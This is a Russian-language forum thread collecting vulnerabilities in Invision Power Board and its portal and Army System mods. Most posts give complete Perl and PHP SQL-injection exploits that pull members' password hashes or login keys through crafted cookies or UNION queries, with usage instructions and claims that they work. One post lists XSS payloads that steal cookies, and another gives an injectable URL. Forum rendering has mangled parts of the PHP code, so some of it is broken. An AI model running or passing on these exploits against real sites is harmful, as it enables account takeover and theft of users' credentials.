+ Ответить в теме
Показано с 1 по 9 из 9

Тема: Уязвимости Invision Power Board

  1. #1
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию Уязвимости Invision Power Board

    Invision Power Board версии до 2.0.4

    Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

    SQL-инъекция существует из-за недостаточной обработки данных в сценарии 'sources/login.php'. Удаленный пользователь может с помощью специально сформированного файла куки выполнить произвольные SQL команды в базе данных приложения при выключенных Magic_quotes_gpc в конфигурационном файле php.

    Отсутствует проверка входных данных при отображении результатов поиска в параметре 'highlite' сценария 'sources/topics.php'. Удаленный пользователь может с помощью специально сформированного файла куки выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

    сплоит:
    Код:
    #!/usr/bin/perl
    
    ## Invision Power Board SQL injection exploit by RST/GHC
    ## vulnerable forum versions : 1.* , 2.* (<2.0.4)
    ## tested on version 1.3 Final and version 2.0.2 
    ## * work on all mysql versions
    ## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
    ## (c)oded by 1dt.w0lf
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## screen:
    ## ~~~~~~~
    ## r57ipb2.pl blah.com /ipb13/ 1 0
    ## [~]    SERVER : blah.com 
    ## [~]      PATH : /ipb13/
    ## [~] MEMBER ID : 1
    ## [~]    TARGET : 0 - IPB 1.*
    ## [~] SEARCHING PASSWORD ... [ DONE ]
    ##
    ## MEMBER ID : 1
    ## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
    ##
    ## r57ipb2.pl blah.com  /ipb202/ 1 1
    ## [~]    SERVER : blah.com 
    ## [~]      PATH : /ipb202/
    ## [~] MEMBER ID : 1
    ## [~]    TARGET : 1 - IPB 2.*
    ## [~] SEARCHING PASSWORD ... [ DONE ]
    ##
    ## MEMBER ID : 1
    ## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## Greets: James Bercegay of the GulfTech Security Research Team 
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru 
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    use IO::Socket;
    
    if (@ARGV < 4) { &usage; }
    
    $server    = $ARGV[0];
    $path      = $ARGV[1];
    $member_id = $ARGV[2];
    $target    = $ARGV[3];
    
    $pass = ($target)?('member_login_key'):('password');
    
    $server =~ s!(http:\/\/)!!;
    
    $request  = 'http://';
    $request .= $server;
    $request .= $path;
    
    $s_num = 1;
    $|++;
    $n = 0;
    
    print "[~]    SERVER : $server\r\n";
    print "[~]      PATH : $path\r\n";
    print "[~] MEMBER ID : $member_id\r\n";
    print "[~]    TARGET : $target";
    print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
    print "\r\n";
    print "[~] SEARCHING PASSWORD ... [|]";
    
    ($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
    
    while(1)
    {
    if(&found(47,58)==0) { &found(96,122); } 
    $char = $i;
    if ($char=="0") 
     { 
     if(length($allchar) > 0){
     print qq{\b\b DONE ] 
     
     MEMBER ID : $member_id
     };
     print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
     print $allchar."\r\n";
     }
     else
     {
     print "\b\b FAILED ]";
     }
     exit();  
     }
    else 
     {  
    $allchar .= chr(42);
     }
    $s_num++;
    }
    
    sub found($$)
     {
     my $fmin = $_[0];
     my $fmax = $_[1];
     if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
     
     $r = int($fmax - ($fmax-$fmin)/2);
     $check = " BETWEEN $r AND $fmax";
     if ( &check($check) ) { &found($r,$fmax); }
     else { &found($fmin,$r); }
     }
     
    sub crack($$)
     {
     my $cmin = $_[0];
     my $cmax = $_[1];
     $i = $cmin;
     while ($i<$cmax)
      {
      $crcheck = "=$i";
      if ( &check($crcheck) ) { return $i; }
      $i++;
      }
     $i = 0;
     return $i;
     }
     
    sub check($)
     {
     $n++;
     status();
     $ccheck = $_[0];
     $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
     $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28"; 
     $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
     $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
     $nmalykh    = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";
     $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
    
     printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
     $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);
     
     while(<$socket>) 
      { 
      if (/Set-Cookie: session_id=0;/) { return 1; }
      } 
    
     return 0;
     }
     
    sub status()
    {
      $status = $n % 5;
      if($status==0){ print "\b\b/]";  }
      if($status==1){ print "\b\b-]";  }
      if($status==2){ print "\b\b\\]"; }
      if($status==3){ print "\b\b|]";  }
    }
    
    sub usage()
     {
     print q(
     Invision Power Board v < 2.0.4 SQL injection exploit
     ----------------------------------------------------
     USAGE:
     ~~~~~~
     r57ipb2.pl [server] [/folder/] [member_id] [target]
     
     [server]    - host where IPB installed
     [/folder/]  - folder where IPB installed
     [member_id] - user id for brute
     
     targets:
              0 - IPB 1.*
              1 - IPB 2.* (Prior To 2.0.4)
     
     e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
     ----------------------------------------------------
     (c)oded by 1dt.w0lf
     RST/GHC , http://rst.void.ru , http://ghc.ru
     );
     exit();
     }
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  2. #2
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию Invision Power Board <= 2.0.3 Login.PHP SQL Injection (working)

    PHP код:
    <?php
    /* 
    <= 2.0.3
    <= 1.3.1 Final
    /str0ke
    */

    $server "SERVER";
    $port 80;
    $file "PATH";

    $target 81;

    /* User id and password used to fake-logon are not important. '10' is a
    random number. */
    $id 10;
    $pass "";

    $hex "0123456789abcdef";
    for(
    $i 1$i <= 32$i++ ) {
            
    $idx 0;
            
    $found false;

            while( !(
    $found) ) {
                    
    $letter substr($hex$idx1);

                    
    /* %2527 translates to %27, which gets past magic quotes.
    This is translated to ' by urldecode. */
                    
    $cookie =
    "member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
                    
    $cookie .=
    "%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" $letter;

                    
    /* Query is in effect: SELECT * FROM ibf_members
                                           WHERE id=$id AND password='$pass' OR
    id=$target
                                           HAVING id=$target AND
    MID(`password`,$i,1)='$letter' */

                    
    $header getHeader($server$port$file .
    "index.php?act=Login&CODE=autologin"$cookie);
                    if( !
    preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
    $header) ) {
                            echo 
    $i ": " $letter "\n";
                            
    $found true;

                            
    $hash .= $letter;
                    } else {
                            
    $idx++;
                    }
            }
    }

    echo 
    "\n\nFinal Hash: $hash\n";

    function 
    getHeader($server$port$file$cookie) {
            
    $ip gethostbyname($server);
            
    $fp fsockopen($ip$port);

            if (!
    $fp) {
                    return 
    "Unknown";
            } else {
                    
    $com "HEAD $file HTTP/1.1\r\n";
                    
    $com .= "Host: $server:$port\r\n";
                    
    $com .= "Cookie: $cookie\r\n";
                    
    $com .= "Connection: close\r\n";
                    
    $com .= "\r\n";

                    
    fputs($fp$com);

                    do {
                            
    $header.= fread($fp512);
                    } while( !
    preg_match('/\r\n\r\n$/',$header) );
            }

            return 
    $header;
    }
    ?>
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  3. #3
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    гг))) а кто нить тестил сплоит, который в первом посте??? судя по молчанию - нет
    а в нем недоработка...я маленько не тот сплоит выложил..
    интересно, а кто нить найдет в чем именно?
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  4. #4
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Описание: Invision PowerBoard 1.3.x - 2.x Privilege escalation through SQL injection
    Опасность: Высокая

    патч: http://www.hackerscenter.com/archive/view.asp?id=3812

    эксплоит:
    Код:
    #!/usr/bin/perl -w
    
    ##################################################################
    # This one actually works :) Just paste the outputted cookie into
    # your request header using livehttpheaders or something and you
    # will probably be logged in as that user. No need to decrypt it!
    # Exploit coded by "ReMuSOMeGa & Nova" and http://www.h4cky0u.org
    ##################################################################
    
    use LWP::UserAgent;
    
    $ua = new LWP::UserAgent;
    $ua->agent("Mosiac 1.0" . $ua->agent);
    
    if (!$ARGV[0]) {$ARGV[0] = '';}
    if (!$ARGV[3]) {$ARGV[3] = '';}
    
    my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
    my $user = $ARGV[1]; # userid to jack
    my $iver = $ARGV[2]; # version 1 or 2
    my $cpre = $ARGV[3]; # cookie prefix
    my $dbug = $ARGV[4]; # debug?
    
    if (!$ARGV[2])
    {
    print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id]
    [ver 1/2]. ";
    exit;
    }
    
    my @charset =
    ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
    
    my $outputs = '';
    
    for( $i=1; $i < 33; $i++ )
    {
    for( $j=0; $j < 16; $j++ )
    {
    my $current = $charset[$j];
    my $sql = ( $iver < 2 ) ?
    "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
    "99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
    my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre .
    "pass_hash=" . $sql);
    my $res = $ua->get($path, @cookie);
    
    # If we get a valid sql request then this
    # does not appear anywhere in the sources
    $pattern = '<title>(.*)Log In(.*)</title>';
    
    $_ = $res->content;
    
    if ($dbug) { print };
    
    if ( !(/$pattern/) )
    {
    $outputs .= $current;
    print "$current ";
    last;
    }
    
    }
    if ( length($outputs) < 1 ) { print "Not Exploitable! "; exit; }
    }
    print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre .
    "pass_hash=" . $outputs;
    exit;
    
    # www.h4cky0u.org
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  5. #5
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    По сообщению Secunia, некий V[i]RuS обнаружил уязвимость в форумах Invision Power Board 1.0.3/2.0.4 (и возможно других версиях). Уязвимость заключается в возможности присоединять HTML и TXT файлы к соообщениям форума, которые содержат скрипты JavaScript. При открытии таких файлов в браузере, на компьютере пользователя происходит отображение страницы и соответственно выполнение скриптов JavaScript. Для решения этой проблемы, рекомендуется запретить прикрепление HTML и TXT файлов к сообщению форума.
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  6. #6
    Banned Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Vanda Включаюсь Аватар для Vanda
    Регистрация
    03.07.2005
    Адрес
    страна мухомория
    Сообщений
    743
    Поблагодарил(а)
    16
    Получено благодарностей: 51 (сообщений: 34).

    По умолчанию Межсайтовый скриптинг в Invision Power Board

    Программа: Invision Power Board 2.1

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание: Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

    1. Уязвимость обнаружена при обработке входных данных в параметрах “address”, “name” и “description” сценария admin.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы. Пример:

    http: //localhost/2p1p0b3/upload/admin.php?adsess=[xss]&act=login&code=login-complete

    http: //localhost/2p1p0b3/upload/admin.php?adsess=[id]&section=content&act=forum&code=new&name=[xss]

    http: //localhost/2p1p0b3/upload/admin.php?name=[xss]&description=[xss]

    2. Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных при обработке полей в различных формах. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

    Уязвимость в ACP Notes:</textarea>'"/><script>alert(document.cookie)</script>

    "Member's Log In User Name", "Member's Display Name","Email Address contains...", "IP Address contains...","AIM name contains...", "ICQ Number contains...", "Yahoo!Identity contains...", "Signature contains...","Less than n posts", "Registered Between (MM-DD-YYYY)","Last Post Between (MM-DD-YYYY)","Last Active Between (MM-DD-YYYY)"

    Уязвимость в Components:</textarea>'"/><script>alert()</script>

    Уязвимость также существует при обарботке входных данных в полях "Member Name", "Password", "Email Address", "Group Icon Image" и "Calendar: Title".

    Решение: Способов устранения уязвимости не существует в настоящее время.

  7. #7
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    Цель эксплоита:Invision Power Board Dragoran Portal Mod 1.3

    Воздействие эксплоита:
    SQL-инъекция
    Код:
    #!/usr/bin/perl
    ###########################################
    #IPB Portal 1.3->Invision Power Board plugin
    #Created By SkOd
    #SED security Team , http://sed-team.be
    ###########################################
    #google:
    #"Portal 1.3 by Dragoran"
    ###########################################
    
    
    
    use IO::Socket;
    if (@ARGV < 3){
    print q{
    ############################################################
    #      IPB Portal 1.3 SQL injection Get Hash Exploit       #
    #          Tested on Invision Power Board 1.3.0           #
    #        created By SkOd. SED Security Team             #
    ############################################################
        ipbpro.pl [HOST] [PATH] [Target id]
          ipbpro.pl www.host.com /forum/ 2 
    ############################################################
    };
    exit;
    }
    $serv = $ARGV[0];
    $dir = $ARGV[1];
    $id = $ARGV[2];
    
    
    $serv =~ s/(http:\/\/)//eg;
    $path = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,1,10),substring(password,11,20),substring(password,21,30)%20FROM%20ibf_members%20Where%20id='.$id.'/*';
    $path2 = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,31,32),null,null%20FROM%20ibf_members%20Where%20id='.$id.'/*';
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
    
    print "[+]Connecting...\n";
    print $socket "GET $path HTTP/1.1\n";
    print $socket "Host: $serv\n";
    print $socket "Accept: */*\n";
    print $socket "Connection: close\n\n";
    print "[+]Connected\n";
    print "[+]User ID: $id\n";
    print "[+]MD5 Hash: ";
    while ($answer = <$socket>)
    {
    $answer =~ s/40%//eg;
    $answer =~ s/30%//eg;
    $answer =~ m/valign="top" width="(.*?)"/ && print "$1";
    }
    
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Exploit Failed\r\n";
    print $socket "GET $path2 HTTP/1.1\n";
    print $socket "Host: $serv\n";
    print $socket "Accept: */*\n";
    print $socket "Connection: close\n\n";
    
    while ($answer = <$socket>)
    {
    $answer =~ s/40%//eg;
    $answer =~ s/30%//eg;
    $answer =~ m/valign="top" width="(.*?)"/ && print "$1";
    }
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  8. #8
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    В одной из популярных модификации Army System версии 2.1(и предыдущих версиях) форумного "движка" Invision Power Board, командой SecuBox Labs была обнаружена уязвимость. Уязвимость заключается в недостаточной проверки параметра "userstat" модулем "/action_public/army.php", что позволяет злоумышленику выполнить произвольный SQL запрос и получить доступ к "чувствительной" информации. Устранить уязвимость можно, добавив следующии строчки PHP-кода после 486 строки в файл "/action_public/army.php":
    PHP код:
    "$id2 = ereg_replace('(***91;^0-9***93;)','',$id2);
    $id2 = (int)$id2;"
    эксплоит:
    PHP код:
    <?php
    /* --------------------------- EXPLOIT ---------------------------
    Invision Power Board Army System Mod 2.1 SQL Injection Exploit
    Tested on: Latest version (2.1.0)
    Discovered on: 06.02.2006 by Alex & fRoGGz
    Credits to: SecuBox Labs

    PLEASE READ THIS !
    The query of the SQL Injection depends about the number of fields in the sql table
    We have successfully tested the exploit on a new fresh IPB 2.1.x with Army 
    System Mod 2.1 installed

    IN NO EVENT SHALL THE OWNER OF THIS CODE OR CONTRIBUTORS BE LIABLE 
    FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
    DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
    SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 
    CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
    OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
    OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
    */

    $target "http://site.com/forums/"// <--- Where ?
    $prefix "ibf_"// <--- SQL prefix ?
    $id 1// <--- Who ?

    print_r(get_infos($target,$prefix,$id));
    if(!
    get_infos($target,$prefix,$id)) echo "failed";

    function 
    get_infos($target,$prefix,$id) {

    $inject "index.php?s=&act=army&userstat=0+UNION+SELECT+id,member_login_key,";
    $inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,";
    $inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,NULL,NULL,";
    $inject.= "NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,";
    $inject.= "NULL+FROM+".$prefix."members+WHERE+id=";

    $filename $target $inject $id;

    $handle fopen ($filename"r");
    $infos = array();

    if (
    feof($handle)) { continue 2; }
    if ( 
    $handle ) {
    while ( (
    $buffer fgets$handle )) )
    {
    if ( 
    strpos$buffer"Name") ) {
    $infos***91;'md5'***93; = strip_tags fgets$handle) );
    break;
    }
    }
    }

    fclose ($handle);

    if (
    count($infos) == 1) return $infos;
    return 
    false;
    }
    ?>

    uinc.ru
    secubox.shadock.net
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

  9. #9
    Джедай nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь nons Трогаюсь
    Регистрация
    22.01.2005
    Сообщений
    3,753
    Поблагодарил(а)
    419
    Получено благодарностей: 1,257 (сообщений: 528).

    По умолчанию

    SQL injection in Invision Power Board 2.1.*

    http://victim.com/index.php?act=members&st=-1[sql code]

    Источник: http://www.cyberlords.net/advisories/cl_ipb2.txt
    Телевизор — это просто маленькое прозрачное окошко в трубе духовного мусоропровода. © В. Пелевин.

+ Ответить в теме

Информация о теме

Пользователи, просматривающие эту тему

Эту тему просматривают: 1 (пользователей: 0 , гостей: 1)

     

Похожие темы

  1. Ragnarok http://10.37.17.176 - Главная тема
    от nobody в разделе Ragnarok Online
    Ответов: 1389
    Последнее сообщение: 16.05.2016, 15:38
  2. Скилы и оружие Gunslinger
    от pomdem в разделе Ragnarok Online
    Ответов: 0
    Последнее сообщение: 25.08.2006, 23:20

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
Рейтинг@Mail.ru
Администрация сайта не выражает согласия
с высказыванием участников форума и не несет
ответственности за их содержание.

Копирование любого материала возможно только
при наличии ссылки на сайт.